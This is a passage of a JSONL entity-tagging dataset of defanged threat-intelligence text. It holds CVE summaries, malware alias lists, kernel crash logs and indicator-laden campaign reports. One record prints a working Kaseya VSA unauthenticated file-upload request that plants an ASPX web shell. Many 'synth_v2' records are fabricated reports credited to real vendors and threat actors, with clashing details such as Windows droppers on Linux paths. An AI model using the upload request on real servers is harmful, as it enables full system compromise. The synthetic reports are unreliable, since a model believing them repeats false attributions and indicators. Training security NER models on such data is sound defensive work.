0000000000000003\nRBP: 0000000000000001 R08: 0000000000000000 R09: 00007ffff61f3138\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000001\nR13: 00007ffff61f3128 R14: 00007fb893dae530 R15: 0000000000000001\n </TASK>", "spans": {"Indicator: https://lore.kernel.org/linux-block/20251212013510.3576091-1-kartikey406@gmail.com/": [[588, 675]], "Indicator: rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org": [[978, 1030]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[933, 937]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-23244"}}
{"text": "ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec С & C 2014–2015 : secondby[ . ]ru darkclub[.]net holerole[ . ]org googleapis.link 2015–2016 : test2016[ . ]ru blackstar[.]pro synchronize[.]pw lineout[.]pw sync-weather[.]pw The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia .", "spans": {"Malware: Android version": [[308, 323]], "Indicator: ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c": [[0, 64]], "Indicator: e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec": [[65, 129]], "Indicator: secondby.ru": [[148, 163]], "Indicator: darkclub.net": [[164, 178]], "Indicator: holerole.org": [[179, 195]], "Indicator: test2016.ru": [[224, 239]], "Indicator: blackstar.pro": [[240, 255]], "Indicator: synchronize.pw": [[256, 272]], "Indicator: lineout.pw": [[273, 285]], "Indicator: sync-weather.pw": [[286, 303]]}, "info": {"id": "cyberner_stix_train_001911", "source": "defanged_augment"}}
{"text": "Modified DLL file ( goopdate[ . ]dll ) used by BRONZE PRESIDENT to install RCSession : 0617cad9e5d559356c43d4037c86227f , f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c , 2ea9ccf653f63bcc3549a313ec9d0bada341556cc32dd2ca4b73e0c034492740 .", "spans": {"Indicator: goopdate.dll": [[20, 36]], "Malware: RCSession": [[75, 84]], "Indicator: 0617cad9e5d559356c43d4037c86227f": [[87, 119]], "Indicator: f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c": [[122, 162]], "Indicator: 2ea9ccf653f63bcc3549a313ec9d0bada341556cc32dd2ca4b73e0c034492740": [[165, 229]]}, "info": {"id": "cyberner_stix_train_003372", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Gootloader campaign:\nStage 1 dropper at /var/tmp/lsass.dmp - SHA256: a6a404e3771fd33d7830cb47b7455502802b681bbd45021791f5ea6f937c54b4\nStage 2 loader at C:\\ProgramData\\helper.sh - SHA256: 533cc53d308ed07bf7cd542aa464f36d7ec9c385c642090a3fc25591e692278e\nFinal payload at C:\\Windows\\Temp\\chrome_helper.exe - SHA256: af96a03902d3eb56d9b0a349c414bdcfe24dc4b9b83df0e5a9b9d85ff41a1ba6\nExfiltration module - SHA1: 77022c34bdbe34e159aa3bf97fcd1495c6c3cbb8\nAll stages communicated with 71[.]55[.]246[.]41. Burp Suite signatures detected in Stage 2.", "spans": {"Malware: Gootloader": [[22, 32]], "Indicator: a6a404e3771fd33d7830cb47b7455502802b681bbd45021791f5ea6f937c54b4": [[91, 155]], "Indicator: 533cc53d308ed07bf7cd542aa464f36d7ec9c385c642090a3fc25591e692278e": [[209, 273]], "Indicator: af96a03902d3eb56d9b0a349c414bdcfe24dc4b9b83df0e5a9b9d85ff41a1ba6": [[335, 399]], "Indicator: 77022c34bdbe34e159aa3bf97fcd1495c6c3cbb8": [[428, 468]], "Indicator: 71.55.246.41": [[498, 516]]}, "info": {"id": "synth_v2_01959", "source": "defanged_augment"}}
{"text": "The output in Figure 3 shows the Process ID ( PID ) of the csrss[.]exe process to be 716 .", "spans": {"Indicator: csrss.exe": [[59, 70]]}, "info": {"id": "cyberner_stix_train_002400", "source": "defanged_augment"}}
{"text": "Due to this feature , it is clear that the developers paid special attention to the work of the implant on Huawei devices . Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic[ . ]net . Axiom : Group72 .", "spans": {"Organization: Huawei": [[107, 113]], "Indicator: Atlantic.net": [[283, 299]]}, "info": {"id": "cyberner_stix_train_002018", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Gootloader campaign:\nStage 1 dropper at /home/user/.config/ntds.dit - SHA256: eb04273bb24b8b6f3a7cad6c3f1b6be66c4b120eaf11f6a2b19f2fc78e1c09c2\nStage 2 loader at /opt/app/bin/chrome_helper.exe - SHA1: 47044f5fbfa47a02d2b519907948086fdee0c8ad\nFinal payload at C:\\Users\\admin\\AppData\\Local\\Temp\\runtime.dll - SHA1: 78d87995bcbe3dc0b4878cabcde7dee9f7fc9773\nExfiltration module - SHA1: 30241c274b04dbf8e895ba42dfb799c0b4033895\nAll stages communicated with 10[.]70[.]150[.]23. Certutil signatures detected in Stage 2.", "spans": {"Malware: Gootloader": [[22, 32]], "Indicator: eb04273bb24b8b6f3a7cad6c3f1b6be66c4b120eaf11f6a2b19f2fc78e1c09c2": [[100, 164]], "Indicator: 47044f5fbfa47a02d2b519907948086fdee0c8ad": [[222, 262]], "Indicator: 78d87995bcbe3dc0b4878cabcde7dee9f7fc9773": [[334, 374]], "Indicator: 30241c274b04dbf8e895ba42dfb799c0b4033895": [[403, 443]], "Indicator: 10.70.150.23": [[473, 491]]}, "info": {"id": "synth_v2_01878", "source": "defanged_augment"}}
{"text": "Artifact Analysis for LockBit campaign:\nStage 1 dropper at C:\\ProgramData\\chrome_helper.exe - SHA256: 4b470fb6baf78ea21eb9df9fd471012356651922573981ab648bc6e665648d37\nStage 2 loader at C:\\Program Files\\Common Files\\helper.sh - MD5: b4ac4aa6462340e3c6fd4d04a336da2e\nFinal payload at C:\\Users\\admin\\Downloads\\dropper.ps1 - SHA1: 60b666c2373e7b0962c721ba025575037d0d8434\nExfiltration module - MD5: 9e0b7c9dd95280119273c4f9f61178c3\nAll stages communicated with 172 [ . ] 57 [ . ] 195 [ . ] 66. LinPEAS signatures detected in Stage 2.", "spans": {"Malware: LockBit": [[22, 29]], "Indicator: 4b470fb6baf78ea21eb9df9fd471012356651922573981ab648bc6e665648d37": [[102, 166]], "Indicator: b4ac4aa6462340e3c6fd4d04a336da2e": [[232, 264]], "Indicator: 60b666c2373e7b0962c721ba025575037d0d8434": [[327, 367]], "Indicator: 9e0b7c9dd95280119273c4f9f61178c3": [[395, 427]], "Indicator: 172.57.195.66": [[457, 488]]}, "info": {"id": "synth_v2_01968", "source": "defanged_augment"}}
{"text": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192 [ . ] 168 [ . ] 1 [ . ] 194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %> <%@ Import namespace=\"System.Web.UI.WebControls\" %> <%@ Import namespace=\"System.Diagnostics\" %> <%@ Import namespace=\"System[ . ]IO\" %> <%@ Import namespace=\"System\" %> <%@ Import namespace=\"System.Data\" %> <%@ Import namespace=\"System.Data.SqlClient\" %> <%@ Import namespace=\"System.Security.AccessControl\" %> <%@ Import namespace=\"System.Security.Principal\" %> <%@ Import namespace=\"System.Collections.Generic\" %> <%@ Import namespace=\"System.Collections\" %> <script runat=\"server\"> private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.", "spans": {"Indicator: 192.168.1.194": [[683, 714]], "Vulnerability: arbitrary file upload": [[271, 292], [2435, 2456]], "Indicator: System.IO": [[1018, 1031]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-30118"}}
{"text": "This vulnerability allows remote attackers to disclose sensitive information and delete arbitrary files on affected installations of NETGEAR ProSAFE Network Management System 1 [ . ] 6 [ . ] 0 [ . ] 26. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the ConfigFileController class. When parsing the realName parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose sensitive information or to create a denial-of-service condition on the system. Was ZDI-CAN-12125.", "spans": {"Indicator: 1.6.0.26": [[175, 201]], "Vulnerability: denial-of-service": [[617, 634]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-27275"}}
{"text": "The RaspiNAS honeypot detected 70 malicious IP addresses in the last hour, including connections from 185 [ . ] 220 [ . ] 101 [ . ] 45, 92 [ . ] 118 [ . ] 160 [ . ] 13, and 45 [ . ] 148 [ . ] 10 [ . ] 78. These IPs were observed performing SSH brute-force attacks targeting port 22 and attempting credential stuffing against common Linux services.", "spans": {"Indicator: 185.220.101.45": [[102, 134]], "Indicator: 92.118.160.13": [[136, 167]], "Indicator: 45.148.10.78": [[173, 203]], "System: RaspiNAS": [[4, 12]], "System: Linux": [[332, 337]]}, "info": {"id": "otx_00001", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed LaZagne artifacts at /opt/app/bin/winlogon.exe. Memory dump analysis confirmed execution of ADFind. Registry modifications pointed to persistence via C:\\Users\\Public\\Documents\\lsass.dmp. Network forensics identified connections to 192 [ . ] 217 [ . ] 227 [ . ] 103 and mail-mail[ . ]club. Email headers traced the initial vector to contact@phishing-domain[ . ]com. File C:\\Windows\\System32\\taskhost.exe (SHA1: b925ef5a1bfe13ed90fb0d58cac8fb4840c97931) was identified as the initial dropper. A staging URL hxxp://cdnrelay[.]org/panel/index.html resolved to 172 [ . ] 101 [ . ] 219 [ . ] 125. Secondary artifact hash: MD5: c53468ce263953cd06f72b572bdaf3be.", "spans": {"Indicator: 192.217.227.103": [[303, 336]], "Indicator: mail-mail.club": [[341, 359]], "Indicator: contact@phishing-domain.com": [[404, 435]], "Indicator: b925ef5a1bfe13ed90fb0d58cac8fb4840c97931": [[482, 522]], "Indicator: hxxp://cdnrelay.org/panel/index.html": [[577, 615]], "Indicator: 172.101.219.125": [[628, 661]], "Indicator: c53468ce263953cd06f72b572bdaf3be": [[693, 725]]}, "info": {"id": "synth_v2_01180", "source": "defanged_augment"}}
{"text": "Artifact Analysis for ShadowPad campaign:\nStage 1 dropper at C:\\Windows\\Temp\\helper.sh - SHA1: 272c1b843d42e539f6af76eda593374382c3d589\nStage 2 loader at /usr/local/bin/sam.hive - SHA1: 4b41b04068834d1f736cfa20a0e979ed4f6168ff\nFinal payload at /tmp/taskhost.exe - SHA1: f12b7f9289afc5413a1ab5765c58e13b75519a12\nExfiltration module - SHA1: e5d32333d56c7c5a1358a29ef01a7676aa96bd71\nAll stages communicated with 10 [ . ] 90 [ . ] 187 [ . ] 139. Hashcat signatures detected in Stage 2.", "spans": {"Malware: ShadowPad": [[22, 31]], "Indicator: 272c1b843d42e539f6af76eda593374382c3d589": [[95, 135]], "Indicator: 4b41b04068834d1f736cfa20a0e979ed4f6168ff": [[186, 226]], "Indicator: f12b7f9289afc5413a1ab5765c58e13b75519a12": [[270, 310]], "Indicator: e5d32333d56c7c5a1358a29ef01a7676aa96bd71": [[339, 379]], "Indicator: 10.90.187.139": [[409, 440]]}, "info": {"id": "synth_v2_01851", "source": "defanged_augment"}}
{"text": "More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky[.]com) .", "spans": {"Malware: TajMahal": [[19, 27]], "Organization: Kaspersky": [[62, 71]], "Indicator: kaspersky.com": [[125, 140]]}, "info": {"id": "dnrti_train_002971", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.PWS.ZKD Trojan/W32.naKocTb.106496 Trojan.Mauvaise.SL1 Spyware.Infostealer.Fareit Spyware.LokiBot Trojan/Fareit.l Trojan.PWS.ZKD TSPY_LOKI.SMA Win32.Trojan.WisdomEyes.16070401.9500.9723 W32/Trojan.LAPN-1109 TSPY_LOKI.SMA Win.Trojan.naKocTb-6331389-1 Trojan.PWS.ZKD Trojan.PWS.ZKD Trojan.Win32.Stealer.eshrhl Trojan.PWS.Stealer.17779 Trojan.naKocTb.Win32.12 BehavesLike[ . ]Win32[ . ]Downloader[ . ]ch W32/Trojan2.PBTA Trojan.naKocTb.l PWS:Win32/Primarypass.A Trojan.PWS.ZKD Troj.W32.naKocTb.tnB5 Trojan/Win32.naKocTb.C1575888 Trojan.naKocTb Trj/GdSda.A Trojan.Nakoctb Win32/PSW.Fareit.L Trojan-Spy.Dyzap Win32/Trojan.15d", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.ch": [[389, 432]]}, "info": {"id": "cyner2_train_005938", "source": "defanged_augment"}}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt[ . ]dll' , which is then injected into iexplore[ . ]exe to install the backdoor , begin collection , and activate command and control .", "spans": {"Organization: security firm": [[17, 30]], "Vulnerability: Adobe Reader vulnerability": [[153, 179]], "Vulnerability: CVE-2017-11882": [[248, 262]], "Indicator: 'NavShExt.dll'": [[329, 347]], "Indicator: iexplore.exe": [[378, 394]]}, "info": {"id": "cyberner_stix_train_001428", "source": "defanged_augment"}}
{"text": "Zscaler ThreatLabz detected a multi-stage attack chain. The initial phishing email from ceo@account-update[.]xyz contained a link to hxxps://cache-login[.]info/collect. This redirected to hxxp://relayrelay[.]xyz/assets/js/payload.js on node-data[.]xyz. A secondary email from security@login-portal[ . ]tech pointed to hxxps://cloudnode[ . ]org/portal/verify which delivered Qbot. The final payload callback was hxxp://securestatic[ . ]org/download/update.exe resolving to 154[.]14[.]197[.]38 via cloud-node[.]dev.", "spans": {"Organization: Zscaler ThreatLabz": [[0, 18]], "Indicator: ceo@account-update.xyz": [[88, 112]], "Indicator: https://cache-login.info/collect": [[133, 167]], "Indicator: hxxp://relayrelay.xyz/assets/js/payload.js": [[188, 232]], "Indicator: node-data.xyz": [[236, 251]], "Indicator: security@login-portal.tech": [[276, 306]], "Indicator: hxxps://cloudnode.org/portal/verify": [[318, 357]], "Malware: Qbot": [[374, 378]], "Indicator: hxxp://securestatic.org/download/update.exe": [[411, 458]], "Indicator: 154.14.197.38": [[472, 491]], "Indicator: cloud-node.dev": [[496, 512]]}, "info": {"id": "synth_v2_01785", "source": "defanged_augment"}}
{"text": "Shopware is an open source eCommerce platform. Versions prior to 6 [ . ] 3 [ . ] 5 [ . ] 1 may leak of information via Store-API. The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. We recommend to update to the current version 6[.]3[.]5[.]1. You can get the update to 6 [ . ] 3 [ . ] 5 [ . ] 1 regularly via the Auto-Updater or directly via the download overview. hxxps://www[.]shopware[.]com/en/download/#shopware-6 The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. Please check your plugins if you have it in use. Detailed technical information can be found in the upgrade information. hxxps://github[ . ]com/shopware/platform/blob/v6.3.5.1/UPGRADE-6.3.md#6351 ### Workarounds For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. hxxps://store[ . ]shopware[ . ]com/en/detail/index/sArticle/518463/number/Swag136939272659 ### For more information hxxps://docs[ . ]shopware[ . ]com/en/shopware-6-en/security-updates/security-update-02-2021", "spans": {"Indicator: 6.3.5.1": [[65, 90], [358, 371], [399, 424]], "Indicator: https://www.shopware.com/en/download/#shopware-6": [[495, 547]], "Indicator: https://github.com/shopware/platform/blob/v6.3.5.1/UPGRADE-6.3.md#6351": [[851, 925]], "Indicator: https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659": [[1129, 1219]], "Indicator: https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021": [[1245, 1336]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-32711"}}
{"text": "A backdoor also known as: Win32.Worm.Fujacks.AB Packed.Win32.TDSS!O W32/Fujacks.s Worm.Fujack.Win32.6 W32/Fujacks.aa.2 PE_FUJACKS.EA Win32.Worm.BMW.b W32/Fujack.R W32.Fujacks.E Win32/Emerleox[ . ]CO PE_FUJACKS.EA Win.Worm.Fujack-8 Worm.Win32.Fujack.aa Win32.Worm.Fujacks.AB Trojan.Win32.Fujack.nsvf W32.W.Fujack.kZ4V Virus.Win32.Viking.a Win32.Worm.Fujacks.AB Win32.HLLP.Whboy.80 BehavesLike.Win32.MultiPlug.th W32/Fujack.R Worm/Viking.Tail TR/Drop.Hupigon.kmx Trojan[Packed]/Win32.CPEX-based Win32.WhBoy.aa.183492 Trojan:WinNT/Kangkio.A Win32.Worm.Fujacks.AB Win32.WhBoy.AJ Worm.Win32.Fujack.aa Win32.Virus.Neshta.D Win32/Dellboy.Z Win32.Worm.Fujacks.AB Win32.HLLW.Whboy RiskWare.Tool.CK Win32.Fujacks.AD Win32/Fujacks.AD Win32.HLLP.WHBoy.AP Worm.Win32.Fujack W32/BoyhW.V Virus.Win32.Viking.LB", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Emerleox.CO": [[183, 198]]}, "info": {"id": "cyner2_train_004978", "source": "defanged_augment"}}
{"text": "Our Threat Intelligence and Interdiction team found the Gustuff malware being advertised in the Exploit[ . ]in forum as a botnet for rent .", "spans": {"Malware: Gustuff": [[56, 63]], "Indicator: Exploit.in": [[96, 110]]}, "info": {"id": "cyner_train_000943", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4: Prevent NULL-pointer dereference in nfs42_complete_copies()\n\nOn the node of an NFS client, some files saved in the mountpoint of the\nNFS server were copied to another location of the same NFS server.\nAccidentally, the nfs42_complete_copies() got a NULL-pointer dereference\ncrash with the following syslog:\n\n[232064.838881] NFSv4: state recovery failed for open file nfs/pvc-12b5200d-cd0f-46a3-b9f0-af8f4fe0ef64.qcow2, error = -116\n[232064.839360] NFSv4: state recovery failed for open file nfs/pvc-12b5200d-cd0f-46a3-b9f0-af8f4fe0ef64.qcow2, error = -116\n[232066.588183] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000058\n[232066.588586] Mem abort info:\n[232066.588701]   ESR = 0x0000000096000007\n[232066.588862]   EC = 0x25: DABT (current EL), IL = 32 bits\n[232066.589084]   SET = 0, FnV = 0\n[232066.589216]   EA = 0, S1PTW = 0\n[232066.589340]   FSC = 0x07: level 3 translation fault\n[232066.589559] Data abort info:\n[232066.589683]   ISV = 0, ISS = 0x00000007\n[232066.589842]   CM = 0, WnR = 0\n[232066.589967] user pgtable: 64k pages, 48-bit VAs, pgdp=00002000956ff400\n[232066.590231] [0000000000000058] pgd=08001100ae100003, p4d=08001100ae100003, pud=08001100ae100003, pmd=08001100b3c00003, pte=0000000000000000\n[232066.590757] Internal error: Oops: 96000007 [#1] SMP\n[232066.590958] Modules linked in: rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs ocfs2_dlmfs ocfs2_stack_o2cb ocfs2_dlm vhost_net vhost vhost_iotlb tap tun ipt_rpfilter xt_multiport ip_set_hash_ip ip_set_hash_net xfrm_interface xfrm6_tunnel tunnel4 tunnel6 esp4 ah4 wireguard libcurve25519_generic veth xt_addrtype xt_set nf_conntrack_netlink ip_set_hash_ipportnet ip_set_hash_ipportip ip_set_bitmap_port ip_set_hash_ipport dummy ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs iptable_filter sch_ingress nfnetlink_cttimeout vport_gre ip_gre ip_tunnel gre vport_geneve geneve vport_vxlan vxlan ip6_udp_tunnel udp_tunnel openvswitch nf_conncount dm_round_robin dm_service_time dm_multipath xt_nat xt_MASQUERADE nft_chain_nat nf_nat xt_mark xt_conntrack xt_comment nft_compat nft_counter nf_tables nfnetlink ocfs2 ocfs2_nodemanager ocfs2_stackglue iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi ipmi_ssif nbd overlay 8021q garp mrp bonding tls rfkill sunrpc ext4 mbcache jbd2\n[232066.591052]  vfat fat cas_cache cas_disk ses enclosure scsi_transport_sas sg acpi_ipmi ipmi_si ipmi_devintf ipmi_msghandler ip_tables vfio_pci vfio_pci_core vfio_virqfd vfio_iommu_type1 vfio dm_mirror dm_region_hash dm_log dm_mod nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 br_netfilter bridge stp llc fuse xfs libcrc32c ast drm_vram_helper qla2xxx drm_kms_helper syscopyarea crct10dif_ce sysfillrect ghash_ce sysimgblt sha2_ce fb_sys_fops cec sha256_arm64 sha1_ce drm_ttm_helper ttm nvme_fc igb sbsa_gwdt nvme_fabrics drm nvme_core i2c_algo_bit i40e scsi_transport_fc megaraid_sas aes_neon_bs\n[232066.596953] CPU: 6 PID: 4124696 Comm: 10 [ . ] 253 [ . ] 166 [ . ] 125- Kdump: loaded Not tainted 5.15.131-9.cl9_ocfs2.aarch64 #1\n[232066.597356] Hardware name: Great Wall .\\x93\\x8e...RF6260 V5/GWMSSE2GL1T, BIOS T656FBE_V3.0.18 2024-01-06\n[232066.597721] pstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[232066.598034] pc : nfs4_reclaim_open_state+0x220/0x800 [nfsv4]\n[232066.598327] lr : nfs4_reclaim_open_state+0x12c/0x800 [nfsv4]\n[232066.598595] sp : ffff8000f568fc70\n[232066.598731] x29: ffff8000f568fc70 x28: 0000000000001000 x27: ffff21003db33000\n[232066.599030] x26: ffff800005521ae0 x25: ffff0100f98fa3f0 x24: 0000000000000001\n[232066.599319] x23: ffff800009920008 x22: ffff21003db33040 x21: ffff21003db33050\n[232066.599628] x20: ffff410172fe9e40 x19: ffff410172fe9e00 x18: 0000000000000000\n[232066.599914] x17: 0000000000000000 x16: 0000000000000004 x15: 0000000000000000\n[232066.600195] x14: 0000000000000000 x13: ffff800008e685a8 x12: 00000000eac0c6e6\n[232066.600498] x11: 00000000000000\n---truncated---", "spans": {"Indicator: 10.253.166.125": [[3024, 3056]], "System: Linux kernel": [[7, 19]], "Vulnerability: NULL pointer dereference": [[671, 695]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-50046"}}
{"text": "Water Saci is a sophisticated cyber threat actor operating in Brazil, utilizing a multi-format attack chain that includes HTA files, ZIP archives, and PDFs to bypass security measures. The campaign employs an email-based C&C infrastructure using IMAP connections to terra[.]com[.]br accounts, enhancing its resilience and evasion tactics. It leverages social engineering through WhatsApp to propagate malware, specifically the SORVEPOTEL banking trojan, and incorporates advanced techniques for infection and persistence. The modular architecture of the malware allows for dynamic adaptation and extraction of sensitive credentials, indicating a significant evolution in adversarial capabilities.", "spans": {"Indicator: terra.com.br": [[266, 282]], "System: WhatsApp": [[379, 387]]}, "info": {"source": "defanged_augment", "name": "Water Saci"}}
{"text": "Artifact Analysis for BatLoader campaign:\nStage 1 dropper at C:\\Users\\Public\\Documents\\dropper.ps1 - SHA1: 241950aedc9dd4bd71af0af08bff44092836ff84\nStage 2 loader at C:\\Program Files\\Common Files\\shell.php - MD5: ee004920e8e9996ae72a66bedffabcd6\nFinal payload at C:\\Users\\Public\\Documents\\shell.php - MD5: 648e9f0529fa90be928c3e94b02959bd\nExfiltration module - MD5: 8744a009f7948abd4c3bd6a47f164621\nAll stages communicated with 191 [ . ] 90 [ . ] 189 [ . ] 242. Impacket signatures detected in Stage 2.", "spans": {"Malware: BatLoader": [[22, 31]], "Indicator: 241950aedc9dd4bd71af0af08bff44092836ff84": [[107, 147]], "Indicator: ee004920e8e9996ae72a66bedffabcd6": [[213, 245]], "Indicator: 648e9f0529fa90be928c3e94b02959bd": [[306, 338]], "Indicator: 8744a009f7948abd4c3bd6a47f164621": [[366, 398]], "Indicator: 191.90.189.242": [[428, 460]]}, "info": {"id": "synth_v2_01856", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2026-38492 is a critical buffer overflow affecting Windows Server 2019. FireEye confirmed active exploitation by Charming Kitten in the wild. Exploitation delivers Emotet (MD5: 14b0001b1ea0a678e74c92d22b95f2a6) which is dropped to /var/tmp/lsass.dmp. The exploit payload is hosted at hxxp://storage-gateway[.]net/collect and communicates to 10[.]13[.]15[.]151 for C2.", "spans": {"Vulnerability: CVE-2026-38492": [[24, 38]], "Vulnerability: buffer overflow": [[53, 68]], "System: Windows Server 2019": [[79, 98]], "Organization: FireEye": [[100, 107]], "Malware: Emotet": [[192, 198]], "Indicator: 14b0001b1ea0a678e74c92d22b95f2a6": [[205, 237]], "Indicator: hxxp://storage-gateway.net/collect": [[312, 348]], "Indicator: 10.13.15.151": [[369, 387]]}, "info": {"id": "synth_v2_00659", "source": "defanged_augment"}}
{"text": "Blog Post by Microsoft MSRC: Tracking Salt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-10425 against Citrix NetScaler deployments. The initial access vector involves spear-phishing emails from confirm@phishing-domain[ . ]com delivering AgentTesla. Post-compromise, the attackers deploy Play and use Sliver for reconnaissance. C2 infrastructure includes 104[.]231[.]202[.]45 and cache-mail[.]dev. A staging server at hxxps://cachebackup[.]online/secure/token hosts additional tooling. Key artifact: C:\\Windows\\Tasks\\taskhost.exe (SHA256: d8dd15f178b09d732cce8ffbaa8d97fc5e55f6cd49389827c69445eaf91d7579).", "spans": {"Organization: Microsoft MSRC": [[13, 27]], "Vulnerability: CVE-2021-10425": [[130, 144]], "System: Citrix NetScaler": [[153, 169]], "Indicator: confirm@phishing-domain.com": [[245, 276]], "Malware: AgentTesla": [[288, 298]], "Malware: Play": [[338, 342]], "Indicator: 104.231.202.45": [[405, 425]], "Indicator: cache-mail.dev": [[430, 446]], "Indicator: https://cachebackup.online/secure/token": [[468, 509]], "Indicator: d8dd15f178b09d732cce8ffbaa8d97fc5e55f6cd49389827c69445eaf91d7579": [[589, 653]]}, "info": {"id": "synth_v2_01559", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: RemcosRAT (MD5: ef1f2475c21839bd3f404e73e318136b). Upon execution on Apache Struts, the sample creates /opt/app/bin/config.dat and injects into legitimate processes. Network analysis shows beaconing to 172[.]253[.]8[.]160 every 60 seconds and DNS queries to securemail[.]live. The second stage was fetched from hxxps://cloudnode[.]info/gate.php and written to C:\\Users\\admin\\AppData\\Local\\Temp\\helper.sh. The payload uses WinPEAS-style techniques for defense evasion. A secondary hash (SHA1: 6d1ddfb83f9320f8ffd20d543eb3b7b882e581c5) was extracted from the unpacked payload.", "spans": {"Malware: RemcosRAT": [[25, 34]], "Indicator: ef1f2475c21839bd3f404e73e318136b": [[41, 73]], "System: Apache Struts": [[94, 107]], "Indicator: 172.253.8.160": [[227, 246]], "Indicator: securemail.live": [[283, 300]], "Indicator: hxxps://cloudnode.info/gate.php": [[336, 369]], "Indicator: 6d1ddfb83f9320f8ffd20d543eb3b7b882e581c5": [[517, 557]]}, "info": {"id": "synth_v2_00543", "source": "defanged_augment"}}
{"text": "Blog Post by Google TAG: Tracking Diamond Sleet's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-39714 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from alert@document-share[ . ]link delivering RemcosRAT. Post-compromise, the attackers deploy Dridex and use Nmap for reconnaissance. C2 infrastructure includes 172[.]241[.]42[.]17 and cdn-backup[.]tech. A staging server at hxxp://api-storage[.]club/api/v2/auth hosts additional tooling. Key artifact: /opt/app/bin/implant.so (SHA1: acfae72999fd8451e4e3fb038e884698cd8a4107).", "spans": {"Organization: Google TAG": [[13, 23]], "Vulnerability: CVE-2023-39714": [[127, 141]], "System: Atlassian Confluence": [[150, 170]], "Indicator: alert@document-share.link": [[246, 275]], "Malware: RemcosRAT": [[287, 296]], "Malware: Dridex": [[336, 342]], "Indicator: 172.241.42.17": [[403, 422]], "Indicator: cdn-backup.tech": [[427, 444]], "Indicator: hxxp://api-storage.club/api/v2/auth": [[466, 503]], "Indicator: acfae72999fd8451e4e3fb038e884698cd8a4107": [[575, 615]]}, "info": {"id": "synth_v2_01634", "source": "defanged_augment"}}
